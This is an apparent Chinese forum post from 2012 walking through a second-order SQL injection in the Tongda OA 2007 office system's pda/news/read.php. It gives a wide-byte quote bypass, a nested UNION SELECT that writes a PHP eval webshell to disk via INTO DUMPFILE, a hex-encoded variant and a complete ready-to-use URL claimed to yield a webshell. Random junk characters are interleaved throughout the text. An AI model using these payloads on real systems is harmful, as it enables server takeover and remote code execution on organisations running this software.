目前测试通达OA2007版本) v9 g! F9 W/ g# ?5 E& S; Y% ]( p
4 R$ N3 ~8 ~" r$ T8 U
9 `8 G8 z2 T; {9 g* wOffice Anywhere 2007 网络智能办公系统
, P+ y& n# X9 G2 D3 j$ j' r/ e
- [" z% x2 D7 Z# {http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
3 c4 N; t9 F. J5 A
4 J( ~5 T9 F; `+ d/ O ( O$ _5 ?4 q O
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
S1 e; W2 n/ I6 J* |1 @
* G) l/ O* C- s. A例如:SELECT * from USER where USER_ID='{$USERNAME}'
* F: H! H# F8 B: M" M' R9 P* d8 R0 i' u其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了$ i7 S& o( C- s c# g r- X& v
+ }- Y- h/ u% r5 P; R这个时候我们是不是可以组合起来使用哪?
+ @: L8 Q2 n# @' t5 n% D + x8 {) x% Q. x/ |/ ^8 Q
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
. _6 G* e. V. W- `( X4 Qunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
: j, r. X4 E( u
8 g5 q) a/ c) z这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了" }1 `# k( ~( [3 B) c& }4 |
% y6 [; _/ H$ x* ^) j9 u B0 J
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。* H( B+ i: `. T( e3 k$ N. d5 p- \
/ T& }4 Q1 C" u/ E$ C' ]0 I
那么我们用字符串格式带入进行hex编码: h+ f3 o! i# Z4 r8 g9 z/ d# o' g
5 `( c( K; L2 D* E& l
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23" ]+ w: U8 X: \+ r
4 U+ A2 z4 a, D; F6 b! u. p+ \+ c
测试ok,获取oa的webshell
& q+ ^" x" L6 ^# B8 g) ?! y
0 i* Q+ O$ L4 b" A* R
1 d. m8 l, U$ v+ R; Rpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23/ A; ?' h7 I$ Z8 s h6 J5 k' h5 t4 [
直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对